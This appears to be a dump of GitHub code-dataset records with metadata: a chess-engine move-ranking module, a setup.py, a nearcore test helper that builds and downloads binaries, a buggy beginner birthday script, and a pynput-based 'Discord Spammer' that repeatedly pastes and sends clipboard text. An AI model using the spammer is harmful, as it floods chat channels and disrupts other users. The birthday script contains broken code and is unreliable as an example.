match.board.COORD['7'] and \n gmove.srcx >= match.board.COORD['3'] and gmove.srcx <= match.board.COORD['6']):\n return True\n elif(piece == PIECES['wKn']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['bKn']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['2'] or gmove.srcx == match.board.COORD['7'])):\n return True\n elif(piece == PIECES['wBp']):\n if(gmove.srcy == match.board.COORD['1'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n elif(piece == PIECES['bBp']):\n if(gmove.srcy == match.board.COORD['8'] and \n (gmove.srcx == match.board.COORD['3'] or gmove.srcx == match.board.COORD['6'])):\n return True\n return False\n else:\n return False\n\n\ndef rank_gmoves(match, priomoves, piecescnt, last_pmove, dbggmove, dbgprio):\n all_attacking = []\n all_supporting = []\n all_fork_defending = []\n all_discl_attacking = []\n all_discl_supporting = []\n all_fleeing = []\n all_running = []\n excludes = []\n\n for priomove in priomoves:\n gmove = priomove.gmove\n from_dstfield_attacked, from_dstfield_supported = find_attacks_and_supports_after_move(gmove)\n frdlytouches_on_dstfield, enmytouches_on_dstfield = find_attacks_on_and_supports_of_dstfield_after_move(gmove)\n discl_attacked, discl_supported = find_disclosures(match, gmove)\n\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield) and \n is_piece_lfe_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n subtactic = priomove.SUB_TACTICS['good-deal']\n else:\n subtactic = priomove.SUB_TACTICS['bad-deal']\n\n if(defends_check(match)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and\n match.is_soft_pin(gmove.srcx, gmove.srcy)[0] == False):\n 
priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-check'], priomove.SUB_TACTICS['bad-deal']))\n\n if(castles(gmove)):\n match.do_move(gmove.srcx, gmove.srcy, gmove.dstx, gmove.dsty, gmove.prom_piece)\n cking = cKing(match, gmove.dstx, gmove.dsty)\n is_king_safe = cking.is_safe()\n match.undo_move()\n if(is_king_safe):\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['castles'], priomove.SUB_TACTICS['bad-deal']))\n\n if(is_tactical_draw(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-tactical-draw'], priomove.SUB_TACTICS['neutral']))\n\n if(promotes(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['promotes'], subtactic))\n\n if(captures(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] or\n is_piece_lfe_captured(gmove)):\n if(is_captured_pinned_or_soft_pinned(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['captures'], subtactic))\n\n if(does_unpin(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['unpins'], subtactic))\n\n if(defends_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['defends-fork'], subtactic))\n all_fork_defending.append(priomove)\n\n if(is_fork_move(gmove, from_dstfield_attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['forks'], subtactic))\n\n if(threatens_fork(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['threatens-fork'], subtactic))\n\n if(flees(gmove)):\n if(subtactic == priomove.SUB_TACTICS['good-deal']):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n friends, enemies = list_all_field_touches(match, match.color_of_piece(piece), gmove.srcx, gmove.srcy)\n if(len(friends) < len(enemies) or\n is_piece_le_attacker_on_srcfield(gmove, enemies) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['urgent']))\n elif(len(friends) == 0):\n priomove.tactics.append(cTactic(priomove.TACTICS['flees'], priomove.SUB_TACTICS['neutral']))\n all_fleeing.append(priomove)\n\n if(len(from_dstfield_attacked) > 0):\n attack_subtactic = subtactic\n if(attack_subtactic == priomove.SUB_TACTICS['bad-deal']):\n if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n attack_subtactic = priomove.SUB_TACTICS['good-deal']\n\n for attacked in from_dstfield_attacked:\n if(attacked.piece == PIECES['wKg'] or \n attacked.piece == PIECES['bKg']):\n if(check_mates(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], priomove.SUB_TACTICS['urgent']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks-king'], attack_subtactic))\n elif(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_attacked_soft_pinned(gmove, attacked)):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['stormy']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], attack_subtactic))\n all_attacking.append(priomove)\n\n if(len(from_dstfield_supported) > 0):\n if(subtactic == priomove.SUB_TACTICS['good-deal'] and \n is_supported_le_attacker(from_dstfield_supported)):\n support_subtactic = 
priomove.SUB_TACTICS['good-deal']\n else:\n support_subtactic = priomove.SUB_TACTICS['bad-deal']\n\n for supported in from_dstfield_supported:\n if(is_supported_running_pawn(match, supported)):\n support_tactic = priomove.TACTICS['supports-running-pawn']\n elif(len(supported.attacker_beyond) > 0):\n support_tactic = priomove.TACTICS['supports']\n else:\n support_tactic = priomove.TACTICS['supports-unattacked']\n\n if(support_subtactic == priomove.SUB_TACTICS['good-deal'] and \n len(supported.attacker_beyond) > 0 and\n (is_supporter_lower_attacker(gmove, supported) or\n match.is_soft_pin(supported.fieldx, supported.fieldy)[0])):\n support_subtactic = priomove.SUB_TACTICS['urgent']\n\n priomove.tactics.append(cTactic(support_tactic, support_subtactic))\n all_supporting.append(priomove)\n\n if(len(discl_attacked) > 0):\n if(is_discl_attacked_supported(discl_attacked) == False):\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['attacks'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_attacking.append(priomove)\n\n if(len(discl_supported) > 0):\n if(is_discl_supported_weak(discl_supported)):\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['supports'], priomove.SUB_TACTICS['bad-deal']))\n all_discl_supporting.append(priomove)\n\n if(blocks(gmove)):\n block_subtactic = subtactic\n if(block_subtactic == priomove.SUB_TACTICS['bad-deal']):\n if(is_piece_lower_attacker_on_dstfield(gmove, enmytouches_on_dstfield) and \n len(frdlytouches_on_dstfield) > 0):\n block_subtactic = priomove.SUB_TACTICS['good-deal']\n priomove.tactics.append(cTactic(priomove.TACTICS['blocks'], block_subtactic))\n\n if(running_pawn_in_endgame(gmove)):\n if(len(frdlytouches_on_dstfield) >= len(enmytouches_on_dstfield)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['good-deal']))\n else:\n priomove.tactics.append(cTactic(priomove.TACTICS['is-running-pawn'], priomove.SUB_TACTICS['bad-deal']))\n all_running.append(priomove)\n\n if(controles_file(priomove.gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['controles-file'], subtactic))\n\n if(is_progress(gmove)):\n priomove.tactics.append(cTactic(priomove.TACTICS['is-progress'], priomove.SUB_TACTICS['neutral']))\n\n if(len(priomove.tactics) > 0):\n piece = match.readfield(gmove.srcx, gmove.srcy)\n priomove.evaluate_priorities(piece)\n\n all_attacking.sort(key=attrgetter('prio'))\n for pmove in all_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(priomove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_attacking.sort(key=attrgetter('prio'))\n for pmove in all_discl_attacking:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['attacks'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_supporting.sort(key=attrgetter('prio'))\n for pmove in all_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n 
excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_discl_supporting.sort(key=attrgetter('prio'))\n for pmove in all_discl_supporting:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['supports'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fork_defending.sort(key=attrgetter('prio'))\n for pmove in all_fork_defending:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['defends-fork'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n excludes.clear()\n all_fleeing.sort(key=attrgetter('prio'))\n for pmove in all_fleeing:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['flees'])\n piece = match.readfield(pmove.gmove.srcx, pmove.gmove.srcy)\n pmove.evaluate_priorities(piece)\n\n \"\"\"excludes.clear()\n all_running.sort(key=attrgetter('prio'))\n for pmove in all_running:\n if(any(e[0] == pmove.gmove.srcx and e[1] == pmove.gmove.srcy for e in excludes) == False):\n excludes.append([pmove.gmove.srcx, pmove.gmove.srcy])\n else:\n pmove.downgrade(pmove.TACTICS['is-running-pawn'])\n pmove.evaluate_priorities()\"\"\"\n\n if(dbggmove):\n for priomove in priomoves:\n if(priomove.gmove.srcx == dbggmove.srcx and \n priomove.gmove.srcy == dbggmove.srcy and \n priomove.gmove.dstx == dbggmove.dstx and \n priomove.gmove.dsty == dbggmove.dsty):\n priomove.prio = dbgprio\n break\n priomoves.sort(key=attrgetter('prio'))\n", "repo_name": "richardtraindl/immanuel", "sub_path": "kate/engine/analyze_move.py", "file_name": "analyze_move.py", "file_ext": "py", "file_size_in_byte": 27269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "match.readfield", "line_number": 21, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 34, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 35, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 36, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 47, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 48, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 49, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 54, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 61, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 62, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 63, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 66, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 74, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 75, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 77, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 83, "usage_type": 
"call"}, {"api_name": "match.undo_move", "line_number": 85, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 111, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 113, "usage_type": "call"}, {"api_name": "pieces.pieces_helper.obj_for_piece", "line_number": 114, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 120, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 123, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 125, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 132, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 133, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 134, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 135, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 141, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 142, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 145, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 147, "usage_type": "call"}, {"api_name": "match.next_color", "line_number": 162, "usage_type": "call"}, {"api_name": "pieces.king.cKing", "line_number": 163, "usage_type": "call"}, {"api_name": "match.board", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pieces.king.cKing", "line_number": 165, "usage_type": "call"}, {"api_name": "match.board", "line_number": 165, "usage_type": "attribute"}, {"api_name": "match.do_move", "line_number": 171, "usage_type": "call"}, {"api_name": "match.is_move_available", "line_number": 172, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 173, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 178, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 179, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen.STEPS", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pieces.queen.cQueen", "line_number": 181, "usage_type": "name"}, {"api_name": "pieces.piece.cTouch", "line_number": 183, "usage_type": "call"}, {"api_name": "pieces.piece.cTouch", "line_number": 184, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 186, "usage_type": "name"}, {"api_name": "pieces.rook.cRook.dir_for_move", "line_number": 187, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 187, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop", "line_number": 190, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop.dir_for_move", "line_number": 191, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 191, "usage_type": "name"}, {"api_name": "match.REVERSE_DIRS", "line_number": 198, "usage_type": "attribute"}, {"api_name": "match.search", "line_number": 200, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 202, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 216, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 217, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 227, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 228, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 242, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 243, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 245, "usage_type": "call"}, {"api_name": 
"match.undo_move", "line_number": 247, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 249, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 257, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 266, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 267, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 276, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 281, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 282, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 283, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 285, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 291, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 296, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 301, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 302, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 303, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 305, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 311, "usage_type": "call"}, {"api_name": "pieces.pawn.cPawn", "line_number": 323, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 329, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 330, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 335, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 336, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 338, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 345, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 348, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 351, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen", "line_number": 354, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 360, "usage_type": "call"}, {"api_name": "helper.reverse_lookup", "line_number": 375, "usage_type": "call"}, {"api_name": "match.is_opening", "line_number": 390, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 391, "usage_type": "call"}, {"api_name": "match.board", "line_number": 393, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 394, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 397, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 398, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 401, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 402, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 405, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 406, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 409, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 410, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 413, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 414, "usage_type": "attribute"}, {"api_name": "match.is_soft_pin", "line_number": 439, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 446, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 452, "usage_type": "call"}, {"api_name": "pieces.king.cKing", 
"line_number": 453, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 455, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 492, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 493, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 540, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 582, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 585, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 591, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 595, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 601, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 605, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 611, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 615, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 621, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 625, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 631, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 635, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 641, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 661, "usage_type": "call"}]}
+{"seq_id": "6523972302", "text": "from setuptools import setup\nimport unittest\n\ndef para_test_suite():\n test_loader = unittest.TestLoader()\n test_suite = test_loader.discover('tests', pattern='test_*.py')\n return test_suite\n\nsetup(name='para',\n version='2.0.1',\n author='Migdalo',\n license='MIT',\n packages=['para'],\n test_suite='setup.para_test_suite',\n entry_points={\n 'console_scripts': [\n 'para = para.para:process_arguments'\n ]\n },\n zip_safe=True)\n\n", "repo_name": "Migdalo/para", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestLoader", "line_number": 5, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "41898045274", "text": "from pynput.keyboard import Key, Controller\r\nimport time\r\nimport clipboard\r\n\r\nfrom tkinter import *\r\n# Packages\r\ngui = Tk()\r\n\r\n\r\ngui.geometry(\"800x300\")\r\ngui.resizable(width=False, height=False)\r\ngui.title('Discord Spammer')\r\n# GUI\r\n\r\ndef getTextInput():\r\n result = text_box.get(\"1.0\",\"end\")\r\n clipboard.copy(result)\r\n# Text Input Value Command\r\n\r\ndef startSpamming():\r\n time.sleep(4)\r\n for _ in range(15):\r\n keyboard = Controller()\r\n with keyboard.pressed(Key.ctrl):\r\n keyboard.press('v')\r\n keyboard.release('v')\r\n keyboard.press(Key.enter)\r\n keyboard.release(Key.enter)\r\n time.sleep(0.5)\r\n\r\n# Main Spamming Command\r\n\r\n\r\nbtn = Button(gui, text = 'Copy Text', bg = 'gray', width = 20, height = 3, command = getTextInput)\r\nbtn.pack()\r\nbtn.place(x=340, y=130)\r\n# Copies a text\r\n\r\nbtn = Button(gui, text = 'Start Spam', bg = 'green', width = 40, height = 5, command = startSpamming)\r\nbtn.pack()\r\nbtn.place(x=270, y=200)\r\n# Start Spam Button\r\n\r\ntext_box = Text(\r\n gui,\r\n height=2,\r\n width=100,\r\n font=(\"Arial\", 32\r\n))\r\n\r\ntext_box.pack()\r\n# Text Box\r\n\r\ngui.mainloop()\r\n\r\n# Project by Fr0das\r\n# Project by Fr0das\r\n# Project by Fr0das", "repo_name": "Fr0das/discord-spammer", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "clipboard.copy", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "pynput.keyboard.Controller", "line_number": 23, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key.ctrl", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 24, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 27, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "20548852206", "text": "print ('hi stupid')\nf_name = input('Whats your first name: ')\nl_name = input('How about a last name: ')\nborn_month = input(' What day of the month were you born?: ')\nborn_day = input('And the month?: ')\nborn_year = input('year?: ')\nprint('Hey ',f_name,l_name,' so your birthday is ',born_month, ' / ',born_day, '/',born_year)\nfrom datetime import date\ntoday = date.year \nprint (date.year )\ncalculate_age = today.year - born_year - ((today.month,today.day) < (born_month,born._day))\ntoday = date.today\n \n \n", "repo_name": "Kukukachuj/cti110", "sub_path": "Messingaround.py", "file_name": "Messingaround.py", "file_ext": "py", "file_size_in_byte": 505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date.year", "line_number": 9, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.year", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "7671268003", "text": "import os\nimport pathlib\nimport subprocess\nimport sys\nimport tempfile\nimport typing\n\nimport semver\nfrom configured_logger import logger\nfrom github import Github\n\n\ndef current_branch():\n return os.environ.get('BUILDKITE_BRANCH') or subprocess.check_output([\n \"git\", \"rev-parse\", \"--symbolic-full-name\", \"--abbrev-ref\", \"HEAD\"\n ]).strip().decode()\n\n\ndef get_releases():\n git = Github(None)\n repo = git.get_repo(\"nearprotocol/nearcore\")\n releases = []\n\n for release in repo.get_releases():\n try:\n # make sure that the version provided is a valid semver version\n version = semver.VersionInfo.parse(release.title)\n releases.append(release)\n except Exception as e:\n pass\n\n return sorted(releases,\n key=lambda release: semver.VersionInfo.parse(release.title),\n reverse=True)\n\n\ndef latest_rc_branch():\n releases = list(\n filter(\n lambda release: (semver.VersionInfo.parse(release.title).prerelease\n or \"\").startswith(\"rc\"), get_releases()))\n\n if not releases:\n return None\n\n return semver.VersionInfo.parse(releases[0].title).finalize_version()\n\n\nclass Executables(typing.NamedTuple):\n root: pathlib.Path\n neard: pathlib.Path\n state_viewer: pathlib.Path\n\n def node_config(self) -> typing.Dict[str, typing.Any]:\n return {\n 'local': True,\n 'neard_root': self.root,\n 'binary_name': self.neard.name\n }\n\n\ndef _compile_binary(branch: str) -> Executables:\n \"\"\"For given branch, compile binary.\n\n Stashes current changes, switches branch and then returns everything back.\n \"\"\"\n # TODO: download pre-compiled binary from github for beta/stable?\n prev_branch = current_branch()\n stash_output = subprocess.check_output(['git', 'stash'])\n subprocess.check_output(['git', 'checkout', str(branch)])\n subprocess.check_output(['git', 'pull', 'origin', str(branch)])\n result = _compile_current(branch)\n subprocess.check_output(['git', 'checkout', prev_branch])\n if stash_output != b\"No local changes to save\\n\":\n subprocess.check_output(['git', 'stash', 'pop'])\n return result\n\n\ndef escaped(branch):\n return branch.replace('/', '-')\n\n\ndef _compile_current(branch: str) -> Executables:\n \"\"\"Compile current branch.\"\"\"\n subprocess.check_call(['cargo', 'build', '-p', 'neard', '--bin', 'neard'])\n subprocess.check_call(['cargo', 'build', '-p', 'near-test-contracts'])\n subprocess.check_call(['cargo', 'build', '-p', 'state-viewer'])\n branch = escaped(branch)\n build_dir = pathlib.Path('../target/debug')\n neard = build_dir / f'neard-{branch}'\n state_viewer = build_dir / f'state-viewer-{branch}'\n (build_dir / 'neard').rename(neard)\n (build_dir / 'state-viewer').rename(state_viewer)\n return Executables(build_dir, neard, state_viewer)\n\n\ndef download_file_if_missing(filename: pathlib.Path, url: str) -> None:\n \"\"\"Downloads a file from given URL if it does not exist already.\n\n Does nothing if file `filename` already exists. Otherwise, downloads data\n from `url` and saves them in `filename`. Downloading is done with `curl`\n tool and on failure (i.e. if it returns non-zero exit code) `filename` is\n not created. On success, the file’s mode is set to 0x555 (i.e. 
readable and\n executable by anyone).\n\n Args:\n filename: Path to the file.\n url: URL of the file to download (if the file is missing).\n \"\"\"\n if filename.exists():\n if not filename.is_file():\n sys.exit(f'{filename} exists but is not a file')\n return\n\n proto = '\"=https\"' if os.uname()[0] == 'Darwin' else '=https'\n cmd = ('curl', '--proto', proto, '--tlsv1.2', '-sSfL', url)\n name = None\n try:\n with tempfile.NamedTemporaryFile(dir=filename.parent,\n delete=False) as tmp:\n name = pathlib.Path(tmp.name)\n subprocess.check_call(cmd, stdout=tmp)\n name.chmod(0o555)\n name.rename(filename)\n name = None\n finally:\n if name:\n name.unlink()\n\n\ndef download_binary(uname, branch):\n \"\"\"Download binary for given platform and branch.\"\"\"\n logger.info(f'Getting near & state-viewer for {branch}@{uname}')\n outdir = pathlib.Path('../target/debug')\n basehref = ('https://s3-us-west-1.amazonaws.com/build.nearprotocol.com'\n f'/nearcore/{uname}/{branch}/')\n neard = outdir / f'neard-{branch}'\n state_viewer = outdir / f'state-viewer-{branch}'\n download_file_if_missing(neard, basehref + 'neard')\n download_file_if_missing(state_viewer, basehref + 'state-viewer')\n return Executables(outdir, neard, state_viewer)\n\n\nclass ABExecutables(typing.NamedTuple):\n stable: Executables\n current: Executables\n\n\ndef prepare_ab_test(stable_branch):\n # Use NEAR_AB_BINARY_EXISTS to avoid rebuild / re-download when testing locally.\n #if not os.environ.get('NEAR_AB_BINARY_EXISTS'):\n # _compile_current(current_branch())\n # uname = os.uname()[0]\n # if stable_branch in ['master', 'beta', 'stable'] and uname in ['Linux', 'Darwin']:\n # download_binary(uname, stable_branch)\n # else:\n is_nayduck = bool(os.getenv('NAYDUCK'))\n\n if is_nayduck:\n # On NayDuck the file is fetched from a builder host so there’s no need\n # to build it.\n root = pathlib.Path('../target/debug/')\n current = Executables(root, root / 'neard', root / 'state-viewer')\n else:\n current = _compile_current(current_branch())\n\n try:\n stable = download_binary(os.uname()[0], stable_branch)\n except Exception:\n if is_nayduck:\n sys.exit('RC binary should be downloaded for NayDuck.')\n stable = _compile_binary(str(stable_branch))\n return ABExecutables(stable=stable, current=current)\n", "repo_name": "MinnMinn/near-core", "sub_path": "pytest/lib/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 5936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 14, 